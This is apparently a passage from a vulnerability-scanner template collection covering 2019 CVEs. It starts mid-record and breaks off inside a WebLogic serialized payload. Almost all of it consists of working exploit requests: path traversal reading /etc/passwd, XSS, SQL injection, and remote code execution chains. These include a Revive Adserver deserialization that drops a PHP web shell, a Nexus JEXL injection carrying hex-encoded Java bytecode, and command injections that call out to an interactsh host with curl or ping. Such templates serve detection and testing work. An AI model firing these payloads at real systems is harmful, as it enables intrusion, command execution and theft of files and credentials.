Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/CDGServer3/ClientAjax"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["<servlet-name>CDGPermissions</servlet-name>"]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1003000","info":{"name":"Jenkins Script Security Plugin <=1.49 - Sandbox Bypass","severity":"high"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["jenkins"],"internal":true,"case-insensitive":true}]},{"raw":["POST /j_acegi_security_check HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nj_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(tolower(body_2), \"jenkins\", \"/logout\")"],"internal":true}]},{"raw":["GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1\nHost: {{Hostname}}\n","GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]},{"raw":["GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom"]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19411","info":{"name":"Huawei Firewall - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/umweb/../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Social Warfare"]}]},{"raw":["GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-6793","info":{"name":"GitLab Enterprise Edition - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /-/jira/login/oauth/access_token HTTP/1.1\nHost: {{interactsh-url}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["access_token="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/userpro/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void 